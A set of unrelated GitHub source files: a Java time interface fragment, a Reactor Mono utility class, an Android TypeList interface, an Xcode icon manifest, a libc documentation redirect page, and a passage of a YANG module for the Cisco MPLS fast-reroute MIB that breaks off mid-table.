* {@code dateTime1.toInstant().equals(dateTime2.toInstant());}.
* <p>
* This default implementation performs the comparison based on the epoch-second
* and nano-of-second.
*
* @param other the other date-time to compare to, not null
* @return true if the instant equals the instant of the specified date-time
*/
default boolean isEqual(ChronoZonedDateTime<?> other) {
return toEpochSecond() == other.toEpochSecond() &&
toLocalTime().getNano() == other.toLocalTime().getNano();
}
//-----------------------------------------------------------------------
/**
* Checks if this date-time is equal to another date-time.
* <p>
* The comparison is based on the offset date-time and the zone.
* To compare for the same instant on the time-line, use {@link #compareTo}.
* Only objects of type {@code ChronoZonedDateTime} are compared, other types return false.
*
* @param obj the object to check, null returns false
* @return true if this is equal to the other date-time
*/
@Override
boolean equals(Object obj);
/**
* A hash code for this date-time.
*
* @return a suitable hash code
*/
@Override
int hashCode();
//-----------------------------------------------------------------------
/**
* Outputs this date-time as a {@code String}.
* <p>
* The output will include the full zoned date-time.
*
* @return a string representation of this date-time, not null
*/
@Override
String toString();
}
| {
"pile_set_name": "Github"
} |
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="BillingPlanGet.aspx.cs" Inherits="PayPal.Sample.BillingPlanGet" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<link href="assets/style.css" rel="stylesheet" type="text/css" />
<title>Untitled Page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
</div>
</form>
</body>
</html>
| {
"pile_set_name": "Github"
} |
package cyclops.companion.reactor;
import com.oath.cyclops.react.Status;
import com.oath.cyclops.types.Value;
import cyclops.companion.Futures;
import cyclops.control.Either;
import cyclops.control.Eval;
import cyclops.control.Future;
import cyclops.control.Maybe;
import cyclops.function.Function3;
import cyclops.function.Function4;
import cyclops.instances.control.FutureInstances;
import cyclops.reactive.ReactiveSeq;
import cyclops.reactive.collections.mutable.ListX;
import io.kindedj.Hk;
import lombok.experimental.UtilityClass;
import org.reactivestreams.Publisher;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
import java.util.Iterator;
import java.util.concurrent.CompletableFuture;
import java.util.function.BiFunction;
import java.util.function.BinaryOperator;
import java.util.function.Consumer;
import java.util.function.Function;
import java.util.function.Predicate;
import java.util.stream.Stream;
/**
* Companion class for working with Reactor Mono types
*
* @author johnmcclean
*
*/
@UtilityClass
public class Monos {
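/**
* Sequence a Publisher of Monos into a single Mono that emits a Flux of the
* values produced by the source Monos.
*
* @param fts Publisher of Monos to sequence
* @return Mono containing a Flux of the collected values
*/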
public static <T> Mono<Flux<T>> sequence(final Publisher<? extends Mono<T>> fts) {
Mono<Flux<T>> identity = Mono.just(Flux.empty());
BiFunction<Mono<Flux<T>>,Mono<T>,Mono<Flux<T>>> combineToStream = (acc,next) ->acc.zipWith(next,(a,b)->Flux.concat(a,Flux.just(b)));
return Flux.from(fts).reduce(identity, combineToStream).flatMap(i->i);
}
public static <T,R> Mono<Flux<R>> traverse(Function<? super T,? extends R> fn,Publisher<Mono<T>> stream) {
Flux<Mono<R>> s = Flux.from(stream).map(h -> h.map(fn));
return sequence(s);
}
public static <T, R> Mono< R> tailRec(T initial, Function<? super T, ? extends Mono<? extends Either<T, R>>> fn) {
Mono<? extends Either<T, R>> next[] = new Mono[1];
next[0] = Mono.just(Either.left(initial));
boolean cont = true;
do {
cont = next[0].map(p -> p.fold(s -> {
next[0] = fn.apply(s);
return true;
}, pr -> false)).block();
} while (cont);
return next[0].map(e->e.orElse(null));
}
public static <T> Future[] futures(Mono<T>... futures){
Future[] array = new Future[futures.length];
for(int i=0;i<array.length;i++){
array[i]=future(futures[i]);
}
return array;
}
public static <T> Future<T> future(Mono<T> future){
return Future.of(future.toFuture());
}
public static <R> Either<Throwable,R> either(Mono<R> either){
return Either.fromPublisher(either);
}
public static <T> Maybe<T> maybe(Mono<T> opt){
return Maybe.fromFuture(future(opt));
}
public static <T> Eval<T> eval(Mono<T> opt){
return Eval.fromFuture(future(opt));
}
/**
* Select the first Mono to complete
*
* @see CompletableFuture#anyOf(CompletableFuture...)
* @param fts Monos to race
* @return First Mono to complete
*/
public static <T> Mono<T> anyOf(Mono<T>... fts) {
return Mono.from(Future.anyOf(futures(fts)));
}
/**
* Wait until all the provided Futures complete
*
* @see CompletableFuture#allOf(CompletableFuture...)
*
* @param fts Monos to wait on
* @return Mono that completes when all the provided Futures Complete. Empty Future result, or holds an Exception
* from a provided Future that failed.
*/
public static <T> Mono<T> allOf(Mono<T>... fts) {
return Mono.from(Future.allOf(futures(fts)));
}
/**
* Block until a Quorum of results have returned as determined by the provided Predicate
*
* <pre>
* {@code
*
* Mono<ListX<Integer>> strings = Monos.quorum(status -> status.getCompleted() >0, Mono.just(1),Mono.empty(),Mono.empty());
strings.block().size()
//1
*
* }
* </pre>
*
*
* @param breakout Predicate that determines whether the block should be
* continued or removed
* @param fts Monos to wait on results from
* @param errorHandler Consumer to handle any exceptions thrown
* @return Mono which will be populated with a Quorum of results
*/
@SafeVarargs
public static <T> Mono<ListX<T>> quorum(Predicate<Status<T>> breakout, Consumer<Throwable> errorHandler, Mono<T>... fts) {
return Mono.from(Futures.quorum(breakout,errorHandler,futures(fts)));
}
/**
* Block until a Quorum of results have returned as determined by the provided Predicate
*
* <pre>
* {@code
*
* Mono<ListX<Integer>> strings = Monos.quorum(status -> status.getCompleted() >0, Mono.just(1),Mono.empty(),Mono.empty());
strings.block().size()
//1
*
* }
* </pre>
*
*
* @param breakout Predicate that determines whether the block should be
* continued or removed
* @param fts Monos to wait on results from
* @return Mono which will be populated with a Quorum of results
*/
@SafeVarargs
public static <T> Mono<ListX<T>> quorum(Predicate<Status<T>> breakout, Mono<T>... fts) {
return Mono.from(Futures.quorum(breakout,futures(fts)));
}
/**
* Select the first Future to return with a successful result
*
* <pre>
* {@code
* Mono<Integer> ft = Mono.empty();
Mono<Integer> result = Monos.firstSuccess(Mono.just(1), ft);
result.block() //1
* }
* </pre>
*
* @param fts Monos to race
* @return First Mono to return with a result
*/
@SafeVarargs
public static <T> Mono<T> firstSuccess(Mono<T>... fts) {
return Mono.from(Future.firstSuccess(futures(fts)));
}
/**
* Perform a For Comprehension over a Mono, accepting 3 generating functions.
* This results in a four level nested internal iteration over the provided Monos.
*
* <pre>
* {@code
*
* import static cyclops.companion.reactor.Monos.forEach4;
*
forEach4(Mono.just(1),
a-> Mono.just(a+1),
(a,b) -> Mono.<Integer>just(a+b),
(a,b,c) -> Mono.<Integer>just(a+b+c),
Tuple::tuple)
*
* }
* </pre>
*
* @param value1 top level Mono
* @param value2 Nested Mono
* @param value3 Nested Mono
* @param value4 Nested Mono
* @param yieldingFunction Generates a result per combination
* @return Mono with a combined value generated by the yielding function
*/
public static <T1, T2, T3, R1, R2, R3, R> Mono<R> forEach4(Mono<? extends T1> value1,
Function<? super T1, ? extends Mono<R1>> value2,
BiFunction<? super T1, ? super R1, ? extends Mono<R2>> value3,
Function3<? super T1, ? super R1, ? super R2, ? extends Mono<R3>> value4,
Function4<? super T1, ? super R1, ? super R2, ? super R3, ? extends R> yieldingFunction) {
Future<? extends R> res = Future.fromPublisher(value1).flatMap(in -> {
Future<R1> a = Future.fromPublisher(value2.apply(in));
return a.flatMap(ina -> {
Future<R2> b = Future.fromPublisher(value3.apply(in, ina));
return b.flatMap(inb -> {
Future<R3> c = Future.fromPublisher(value4.apply(in, ina, inb));
return c.map(in2 -> yieldingFunction.apply(in, ina, inb, in2));
});
});
});
return Mono.from(res);
}
/**
* Perform a For Comprehension over a Mono, accepting 2 generating functions.
* This results in a three level nested internal iteration over the provided Monos.
*
* <pre>
* {@code
*
* import static cyclops.companion.reactor.Monos.forEach3;
*
forEach3(Mono.just(1),
a-> Mono.just(a+1),
(a,b) -> Mono.<Integer>just(a+b),
Tuple::tuple)
*
* }
* </pre>
*
* @param value1 top level Mono
* @param value2 Nested Mono
* @param value3 Nested Mono
* @param yieldingFunction Generates a result per combination
* @return Mono with a combined value generated by the yielding function
*/
public static <T1, T2, R1, R2, R> Mono<R> forEach3(Mono<? extends T1> value1,
Function<? super T1, ? extends Mono<R1>> value2,
BiFunction<? super T1, ? super R1, ? extends Mono<R2>> value3,
Function3<? super T1, ? super R1, ? super R2, ? extends R> yieldingFunction) {
Future<? extends R> res = Future.fromPublisher(value1).flatMap(in -> {
Future<R1> a = Future.fromPublisher(value2.apply(in));
return a.flatMap(ina -> {
Future<R2> b = Future.fromPublisher(value3.apply(in, ina));
return b.map(in2 -> yieldingFunction.apply(in, ina, in2));
});
});
return Mono.from(res);
}
/**
* Perform a For Comprehension over a Mono, accepting a generating function.
* This results in a two level nested internal iteration over the provided Monos.
*
* <pre>
* {@code
*
* import static cyclops.companion.reactor.Monos.forEach;
*
forEach(Mono.just(1),
a-> Mono.just(a+1),
Tuple::tuple)
*
* }
* </pre>
*
* @param value1 top level Mono
* @param value2 Nested Mono
* @param yieldingFunction Generates a result per combination
* @return Mono with a combined value generated by the yielding function
*/
public static <T, R1, R> Mono<R> forEach(Mono<? extends T> value1,
Function<? super T, Mono<R1>> value2,
BiFunction<? super T, ? super R1, ? extends R> yieldingFunction) {
Future<R> res = Future.fromPublisher(value1).flatMap(in -> {
Future<R1> a = Future.fromPublisher(value2.apply(in));
return a.map(ina -> yieldingFunction.apply(in, ina));
});
return Mono.from(res);
}
/**
* Lazily combine this Mono with the supplied value via the supplied BiFunction
*
* @param mono Mono to combine with another value
* @param app Value to combine with supplied mono
* @param fn Combiner function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> combine(Mono<? extends T1> mono, Value<? extends T2> app,
BiFunction<? super T1, ? super T2, ? extends R> fn) {
return Mono.from(Future.of(mono.toFuture())
.zip(app, fn));
}
/**
* Lazily combine this Mono with the supplied Mono via the supplied BiFunction
*
* @param mono Mono to combine with another value
* @param app Mono to combine with supplied mono
* @param fn Combiner function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> combine(Mono<? extends T1> mono, Mono<? extends T2> app,
BiFunction<? super T1, ? super T2, ? extends R> fn) {
return Mono.from(Future.of(mono.toFuture())
.zip(Future.of(app.toFuture()), fn));
}
/**
* Combine the provided Mono with the first element (if present) in the provided Iterable using the provided BiFunction
*
* @param mono Mono to combine with an Iterable
* @param app Iterable to combine with a Mono
* @param fn Combining function
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> zip(Mono<? extends T1> mono, Iterable<? extends T2> app,
BiFunction<? super T1, ? super T2, ? extends R> fn) {
return Mono.from(Future.of(mono.toFuture())
.zip(app, fn));
}
/**
* Combine the provided Mono with the first element (if present) in the provided Publisher using the provided BiFunction
*
* @param mono Mono to combine with a Publisher
* @param fn Combining function
* @param app Publisher to combine with a Mono
* @return Combined Mono
*/
public static <T1, T2, R> Mono<R> zip(Mono<? extends T1> mono, BiFunction<? super T1, ? super T2, ? extends R> fn,
Publisher<? extends T2> app) {
Mono<R> res = Mono.from(Future.of(mono.toFuture()).zip(fn,app));
return res;
}
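    /*
     * Illustrative usage sketch (not part of the original Javadoc). Only the
     * first element of the Publisher is combined with the Mono, per the
     * contract above; Flux.just is Reactor's standard factory:
     *
     *   Mono<Integer> first  = Mono.just(2);
     *   Flux<Integer> others = Flux.just(5, 6, 7);
     *   Mono<Integer> sum    = Monos.zip(first, (a, b) -> a + b, others);
     *   // sum emits 7 (2 + 5); the remaining elements of 'others' are ignored
     */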
/**
* Construct a Mono from Iterable by taking the first value from Iterable
*
* @param t Iterable to populate Mono from
* @return Mono containing first element from Iterable (or empty Mono)
*/
public static <T> Mono<T> fromIterable(Iterable<T> t) {
return Mono.from(Flux.fromIterable(t));
}
/**
* Get an Iterator for the value (if any) in the provided Mono
*
* @param pub Mono to get Iterator for
* @return Iterator over Mono value
*/
public static <T> Iterator<T> iterator(Mono<T> pub) {
return Future.fromPublisher(pub).iterator();
}
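    /*
     * Illustrative round trip (not part of the original Javadoc), combining
     * fromIterable and iterator; java.util.Arrays.asList is assumed only for
     * building the sample input:
     *
     *   Mono<String> head = Monos.fromIterable(java.util.Arrays.asList("a", "b", "c"));
     *   Iterator<String> it = Monos.iterator(head);
     *   while (it.hasNext()) {
     *       System.out.println(it.next()); // prints "a" - only the first element is taken
     *   }
     */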
public static <R> Mono<R> narrow(Mono<? extends R> apply) {
return (Mono<R>)apply;
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.duy.dx .rop.type;
/**
* List of {@link Type} instances (or of things that contain types).
*/
public interface TypeList {
/**
* Returns whether this instance is mutable. Note that the
* {@code TypeList} interface itself doesn't provide any
* means of mutation, but that doesn't mean that there isn't an
* extra-interface way of mutating an instance.
*
* @return {@code true} if this instance is mutable or
* {@code false} if it is immutable
*/
public boolean isMutable();
/**
* Gets the size of this list.
*
* @return {@code >= 0;} the size
*/
public int size();
/**
* Gets the indicated element. It is an error to call this with the
* index for an element which was never set; if you do that, this
* will throw {@code NullPointerException}.
*
* @param n {@code >= 0, < size();} which element
* @return {@code non-null;} the indicated element
*/
public Type getType(int n);
/**
* Gets the number of 32-bit words required to hold instances of
* all the elements of this list. This is a sum of the widths (categories)
* of all the elements.
*
* @return {@code >= 0;} the required number of words
*/
public int getWordCount();
/**
* Returns a new instance which is identical to this one, except that
* the given item is appended to the end and it is guaranteed to be
* immutable.
*
* @param type {@code non-null;} item to append
* @return {@code non-null;} an appropriately-constructed instance
*/
public TypeList withAddedType(Type type);
}
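/*
 * Illustrative sketch (not part of the original sources): a minimal immutable
 * implementation of the contract above. Type.getCategory() is assumed to return
 * the width (category) of an element, which is what getWordCount() sums.
 *
 *   final class ImmutableTypeList implements TypeList {
 *       private final Type[] types;
 *
 *       ImmutableTypeList(Type... types) { this.types = types.clone(); }
 *
 *       public boolean isMutable()  { return false; }
 *       public int size()           { return types.length; }
 *       public Type getType(int n)  { return types[n]; }
 *
 *       public int getWordCount() {
 *           int words = 0;
 *           for (Type t : types) {
 *               words += t.getCategory(); // 1 for 32-bit values, 2 for long/double
 *           }
 *           return words;
 *       }
 *
 *       public TypeList withAddedType(Type type) {
 *           Type[] copy = java.util.Arrays.copyOf(types, types.length + 1);
 *           copy[types.length] = type;
 *           return new ImmutableTypeList(copy); // result is itself immutable
 *       }
 *   }
 */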
| {
"pile_set_name": "Github"
} |
{
"images" : [
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "20x20"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "20x20"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "29x29"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "29x29"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "40x40"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "40x40"
},
{
"idiom" : "iphone",
"scale" : "2x",
"size" : "60x60"
},
{
"idiom" : "iphone",
"scale" : "3x",
"size" : "60x60"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "20x20"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "20x20"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "29x29"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "29x29"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "40x40"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "40x40"
},
{
"idiom" : "ipad",
"scale" : "1x",
"size" : "76x76"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "76x76"
},
{
"idiom" : "ipad",
"scale" : "2x",
"size" : "83.5x83.5"
},
{
"idiom" : "ios-marketing",
"scale" : "1x",
"size" : "1024x1024"
}
],
"info" : {
"author" : "xcode",
"version" : 1
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="refresh" content="0;URL=../../libc/fn.execv.html">
</head>
<body>
<p>Redirecting to <a href="../../libc/fn.execv.html">../../libc/fn.execv.html</a>...</p>
<script>location.replace("../../libc/fn.execv.html" + location.search + location.hash);</script>
</body>
</html> | {
"pile_set_name": "Github"
} |
/*
* Generated by confdc --mib2yang-std
* Source: mgmt/dmi/model/mib/src/CISCO-IETF-FRR-MIB.mib
*/
/*
* This YANG module has been generated by smidump 0.5.0:
*
* smidump -f yang CISCO-IETF-FRR-MIB
*
* Do not edit. Edit the source file instead!
*/
module CISCO-IETF-FRR-MIB {
namespace "urn:ietf:params:xml:ns:yang:smiv2:CISCO-IETF-FRR-MIB";
prefix CISCO-IETF-FRR-MIB;
import IF-MIB {
prefix "if-mib";
}
import MPLS-TC-STD-MIB {
prefix "mpls-tc";
}
import SNMPv2-TC {
prefix "snmpv2-tc";
}
import ietf-yang-smiv2 {
prefix "smiv2";
}
import ietf-yang-types {
prefix "yang";
}
organization
"Cisco Systems, Inc.";
contact
"
Adrien Grise
Postal: 300 Apollo Drive
Cisco Systems, Inc.
Chelmsford, MA 01824
Tel: +1-978-497-3989
Email: [email protected]
Thomas D. Nadeau
Postal: Cisco Systems, Inc.
250 Apollo Drive
Chelmsford, MA 01924
Tel: +1-978-244-3051
Email: [email protected]
MPLS MIB Development Team
Postal: Cisco Systems, Inc.
250 Apollo Drive
Chelmsford, MA 01924
Tel: +1-978-497-3989
Email: [email protected]";
description
"This MIB module contains managed object definitions for MPLS
Fast Reroute (FRR) as defined in: Pan, P., Gan, D., Swallow, G.,
Vasseur, J.Ph., Cooper, D., Atlas, A., Jork, M., Fast Reroute
Techniques in RSVP-TE, draft-ietf-mpls-rsvp-lsp-fastreroute-
00.txt, January 2002.";
revision 2008-04-29 {
description
"Added support for cmplsFrrUnProtected notification. It is
defined in version 2 of the ietf draft. The notification's
variable bindings have been modified from the draft form to
match the previous approved Cisco-ized draft form as defined
for the cmplsFrrProtected notification.";
}
revision 2002-11-05 {
description
"Cisco'ized the MPLS-FRR-MIB.my file";
}
revision 2002-11-01 {
description
"Added support for Facility-based FRR.
Removed tables that were redundant with
other MPLS MIBs.
Assigned experimental.120.";
}
revision 2002-03-22 {
description
"Initial draft version.";
}
typedef MplsFrrDetourIndex {
type int32 {
range "1..65535";
}
description
"Index into mplsFrrDetourTable.";
}
container CISCO-IETF-FRR-MIB {
config false;
container cmplsFrrScalars {
smiv2:oid "1.3.6.1.4.1.9.10.98.1";
leaf cmplsFrrDetourIncoming {
type uint32;
description
"The number of detour LSPs entering the device if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0),
or 0 if mplsFrrConstProtectionMethod is set to
facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.1";
}
leaf cmplsFrrDetourOutgoing {
type uint32;
description
"The number of detour LSPs leaving the device if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0),
or 0 if mplsFrrConstProtectionMethod is set to
facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.2";
}
leaf cmplsFrrDetourOriginating {
type uint32;
description
"The number of detour LSPs originating at this PLR if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0).
This object MUST return 0 if the mplsFrrConstProtectionMethod
is set to facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.3";
}
leaf cmplsFrrSwitchover {
type uint32;
description
"The number of tunnel instances that are switched over to their
corresponding detour LSP if mplsFrrConstProtectionMethod is set
to oneToOneBackup(0), or tunnels being switched over if
mplsFrrConstProtectionMethod is set to facilityBackup(1).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.4";
}
leaf cmplsFrrNumOfConfIfs {
type uint32;
description
"Indicates the number of MPLS interfaces configured for
protection by the FRR feature, otherwise this value
MUST return 0 to indicate that LSPs traversing any
interface may be protected.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.5";
}
leaf cmplsFrrActProtectedIfs {
type uint32;
description
"Indicates the number of interfaces currently being protected
by the FRR feature if mplsFrrConstProtectionMethod is set to
facilityBackup(1), otherwise this value should return 0 to
indicate that LSPs traversing any interface may be protected.
This value MUST be less than or equal to mplsFrrConfIfs.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.6";
}
leaf cmplsFrrConfProtectingTuns {
type uint32;
description
"Indicates the number of bypass tunnels configured to
protect facilities on this LSR using the FRR feature
if mplsFrrConstProtectionMethod is set to
facilityBackup(1), otherwise this value MUST return
0.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.7";
}
leaf cmplsFrrActProtectedTuns {
type uint32;
description
"Indicates the number of bypass tunnels indicated in
mplsFrrConfProtectingTuns whose operStatus
is up(1) indicating that they are currently protecting
facilities on this LSR using the FRR feature. This
object MUST return 0 if mplsFrrConstProtectionMethod
is set to oneToOneBackup(0).";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.8";
}
leaf cmplsFrrActProtectedLSPs {
type uint32;
description
"Indicates the number of LSPs currently protected by
the FRR feature. If mplsFrrConstProtectionMethod is set
to facilityBackup(1)this object MUST return 0.";
smiv2:defval "0";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.9";
}
leaf cmplsFrrConstProtectionMethod {
type enumeration {
enum "oneToOneBackup" {
value "0";
}
enum "facilityBackup" {
value "1";
}
}
description
"Indicates which protection method is to be used for fast
reroute. Some devices may require a reboot of their routing
processors if this variable is changed. An agent which
does not wish to reboot or modify its FRR mode
MUST return an inconsistentValue error. Please
consult the device's agent capability statement
for more details.";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.10";
}
leaf cmplsFrrNotifsEnabled {
type boolean;
description
"Enables or disables FRR notifications defined in this MIB
module. Notifications are disabled by default.";
smiv2:defval "false";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.11";
}
leaf cmplsFrrLogTableMaxEntries {
type uint32;
description
"Indicates the maximum number of entries allowed in the FRR
Log table. Agents receiving SETs for values that cannot be
used must return an inconsistentValue error. If a manager
sets this value to 0, this indicates that no logging should
take place by the agent.
If this value is returned as 0, this indicates
that no additional log entries will be added to the current
table either because the table has been completely
filled or logging has been disabled. However, agents
may wish to not delete existing entries in the log table
so that managers may review them in the future.
It is implied that when mplsFrrLogTableCurrEntries
has reached the value of this variable, that logging
entries may not continue to be added to the table,
although existing ones may remain. Furthermore, an
agent may begin to delete existing (perhaps the
oldest entries) entries to make room for new ones.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.12";
}
leaf cmplsFrrLogTableCurrEntries {
type yang:counter32;
description
"Indicates the current number of entries in the FRR log
table.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.13";
}
leaf cmplsFrrNotifMaxRate {
type uint32;
description
"This variable indicates the number of milliseconds
that must elapse between notification emissions. If
events occur more rapidly, the implementation may
simply fail to emit these notifications during that
period, or may queue them until an appropriate
time in the future. A value of 0 means no minimum
elapsed period is specified.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.1.14";
}
}
container cmplsFrrConstTable {
description
"This table shows detour setup constraints.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1";
list cmplsFrrConstEntry {
key "cmplsFrrConstIfIndex cmplsFrrConstTunnelIndex cmplsFrrConstTunnelInstance";
description
"An entry in this table represents detour LSP or bypass tunnel
setup constraints for a tunnel instance to be protected by
detour LSPs or a tunnel. Agents must allow entries in this table
to be created only for tunnel instances that require fast-reroute.
Entries indexed with mplsFrrConstIfIndex set to 0 apply to all
interfaces on this device on which the FRR feature can operate.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1";
leaf cmplsFrrConstIfIndex {
type if-mib:InterfaceIndexOrZero;
description
"Uniquely identifies an interface for which fast reroute is
configured. Tabular entries indexed with a 0 value apply to all
interfaces on this device on which the FRR feature can operate.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.1";
}
leaf cmplsFrrConstTunnelIndex {
type mpls-tc:MplsTunnelIndex;
description
"Uniquely identifies a tunnel for which fast reroute is
requested.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.2";
}
leaf cmplsFrrConstTunnelInstance {
type mpls-tc:MplsTunnelInstanceIndex;
description
"Uniquely identifies an instance of this tunnel for which fast
reroute is requested.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.3";
}
leaf cmplsFrrConstSetupPrio {
type uint32 {
range "0..7";
}
description
"Indicates the setup priority of the detour LSP.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001";
smiv2:defval "7";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.4";
}
leaf cmplsFrrConstHoldingPrio {
type uint32 {
range "0..7";
}
description
"Indicates the holding priority for the detour LSP.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.5";
}
leaf cmplsFrrConstInclAnyAffinity {
type mpls-tc:MplsTunnelAffinity;
description
"A link satisfies the include-any constraint if and only if the
constraint is zero, or the link and the constraint have a
resource class in common.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.6";
}
leaf cmplsFrrConstInclAllAffinity {
type mpls-tc:MplsTunnelAffinity;
description
"A link satisfies the include-all constraint if and only if the
link contains all of the administrative groups specified in the
constraint.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.7";
}
leaf cmplsFrrConstExclAllAffinity {
type mpls-tc:MplsTunnelAffinity;
description
"A link satisfies the exclude-all constraint if and only if the
link contains none of the administrative groups specified in the
constraint.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels, Awduche et al,
RFC 3209, December 2001.";
smiv2:defval "0";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.8";
}
leaf cmplsFrrConstHopLimit {
type uint32 {
range "1..65535";
}
description
"The maximum number of hops that the detour LSP may traverse.";
reference
"Pan, P., Gan, D., Swallow, G., Vasseur, J.Ph., Cooper, D.,
Atlas, A., Jork, M., Fast Reroute Techniques in RSVP-TE, draft-
ietf-mpls-rsvp-lsp-fastreroute-00.txt, January 2002. Work in
progress.";
smiv2:defval "32";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.9";
}
leaf cmplsFrrConstBandwidth {
type mpls-tc:MplsBitRate;
description
"This variable represents the bandwidth for detour LSPs of this
tunnel, in units of thousands of bits per second (Kbps).";
smiv2:defval "1";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.10";
}
leaf cmplsFrrConstRowStatus {
type snmpv2-tc:RowStatus;
description
"This object is used to create, modify, and/or delete a row in
this table.";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.11";
}
leaf cmplsFrrConstNumProtectingTunOnIf {
type yang:gauge32;
description
"The number of backup tunnels protecting the specified
interface.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.12";
}
leaf cmplsFrrConstNumProtectedTunOnIf {
type yang:gauge32;
description
"The number of tunnels protected on this interface.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.1.1.13";
}
}
}
container cmplsFrrLogTable {
description
"The fast reroute log table records fast reroute events such
as protected links going up or down or the FRR feature
kicking in.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2";
list cmplsFrrLogEntry {
key "cmplsFrrLogIndex";
description
"An entry in this table is created to describe one fast
reroute event. Entries in this table are only created and
destroyed by the agent implementation. The maximum number
of entries in this log is governed by the cmplsFrrLogTableMaxEntries scalar.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1";
leaf cmplsFrrLogIndex {
type uint32;
description
"Uniquely identifies a fast reroute event entry.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.1";
}
leaf cmplsFrrLogEventTime {
type yang:timestamp;
description
"This object provides the number of time ticks since this
event occurred.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.2";
}
leaf cmplsFrrLogInterface {
type if-mib:InterfaceIndexOrZero;
description
"This object indicates which interface was affected by this
FRR event. This value may be set to 0 if
mplsFrrConstProtectionMethod is set to oneToOneBackup(0).";
